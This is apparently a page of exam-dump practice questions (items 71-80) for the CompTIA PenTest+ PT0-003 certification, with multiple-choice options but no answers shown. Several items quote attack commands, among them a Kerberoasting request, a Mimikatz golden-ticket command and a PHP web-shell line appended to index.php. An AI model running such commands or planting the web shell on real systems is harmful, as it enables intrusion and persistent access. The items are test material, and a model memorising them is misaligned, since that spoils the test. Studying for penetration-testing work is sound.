Pre-Summer Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: force70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 8 out of 10 pages
Viewing questions 71-80 out of questions
Questions # 71:

A penetration tester is performing a cloud-based penetration test against a company. Stakeholders have indicated the priority is to see if the tester can get into privileged systems that are not directly accessible from the internet. Given the following scanner information:

Server-side request forgery (SSRF) vulnerability in test.comptia.org

Reflected cross-site scripting (XSS) vulnerability in test2.comptia.org

Publicly accessible storage system named static_comptia_assets

SSH port 22 open to the internet on test3.comptia.org

Open redirect vulnerability in test4.comptia.org

Which of the following attack paths should the tester prioritize first?

Options:

A.

Synchronize all the information from the public bucket and scan it with Trufflehog.


B.

Run Pacu to enumerate permissions and roles within the cloud-based systems.


C.

Perform a full dictionary brute-force attack against the open SSH service using Hydra.


D.

Use the reflected cross-site scripting attack within a phishing campaign to attack administrators.


E.

Leverage the SSRF to gain access to credentials from the metadata service.


Expert Solution
Questions # 72:

Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?

Options:

A.

Preserving artifacts


B.

Reverting configuration changes


C.

Keeping chain of custody


D.

Exporting credential data


Expert Solution
Questions # 73:

A penetration tester observes the following output from an Nmap command while attempting to troubleshoot connectivity to a Linux server:

Starting Nmap 7.91 ( https://nmap.org ) at 2024-01-10 12:00 UTC

Nmap scan report for example.com (192.168.1.10)

Host is up (0.001s latency).

Not shown: 9999 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

2222/tcp open ssh

444/tcp open microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds

Which of the following is the most likely reason for the connectivity issue?

Options:

A.

The SSH service is running on a different port.


B.

The SSH service is blocked by a firewall.


C.

The SSH service requires certificate authentication.


D.

The SSH service is not active.


Expert Solution
Questions # 74:

During the reconnaissance phase, a penetration tester collected the following information from the DNS records:

A----- > www

A----- > host

TXT -- > vpn.comptia.org

SPF--- > ip =2.2.2.2

Which of the following DNS records should be in place to avoid phishing attacks using spoofing domain techniques?

Options:

A.

MX


B.

SOA


C.

DMARC


D.

CNAME


Expert Solution
Questions # 75:

During an assessment, a penetration tester runs the following command from a Linux machine:

GetUsersSPNs.py -dc-ip 172.16.1.1 DOMAIN.LOCAL/aholliday -request

Which of the following is the penetration tester trying to do?

Options:

A.

Crack the user password for aholliday


B.

Download all TGS tickets for offline processing


C.

Perform a pass-the-hash attack using the hash for aholliday


D.

Perform password spraying


Expert Solution
Questions # 76:

A penetration tester is performing an assessment focused on attacking the authentication identity provider hosted within a cloud provider. During the reconnaissance phase, the tester finds that the system is using OpenID Connect with OAuth and has dynamic registration enabled. Which of the following attacks should the tester try first?

Options:

A.

A password-spraying attack against the authentication system


B.

A brute-force attack against the authentication system


C.

A replay attack against the authentication flow in the system


D.

A mask attack against the authentication system


Expert Solution
Questions # 77:

Which of the following components of a penetration test report most directly contributes to prioritizing remediations?

Options:

A.

Proof of concept


B.

Risk scoring


C.

Attack narrative


D.

Executive summary


Expert Solution
Questions # 78:

During an internal penetration test, the tester uses the following command:

C:\ Invoke-mimikatz.ps1 " kerberos::golden /domain:test.local /sid:S-1-5-21-3234... /target: dc01.test.local /service:CIFS /RC4:237749d82... /user:support.test.local /ptt "

Which of the following best describes the tester’s goal when executing this command?

Options:

A.

Bypassing normal authentication


B.

Enumerating shares


C.

Obtaining current user credentials


D.

Using password spraying


Expert Solution
Questions # 79:

During a penetration test, a tester attempts to pivot from one Windows 10 system to another Windows system. The penetration tester thinks a local firewall is blocking connections. Which of the following command-line utilities built into Windows is most likely to disable the firewall?

Options:

A.

certutil.exe


B.

bitsadmin.exe


C.

msconfig.exe


D.

netsh.exe


Expert Solution
Questions # 80:

A penetration tester obtains a reverse shell on a server and executes the following command on the compromised server:

echo ' < ?php system($_GET[ " c " ]); ? > ' > > /var/www/public/index.php

Which of the following best explains what the penetration tester is trying to do?

Options:

A.

Prevent detection.


B.

Circumvent controls.


C.

Move laterally.


D.

Establish persistence.


Expert Solution
Viewing page 8 out of 10 pages
Viewing questions 71-80 out of questions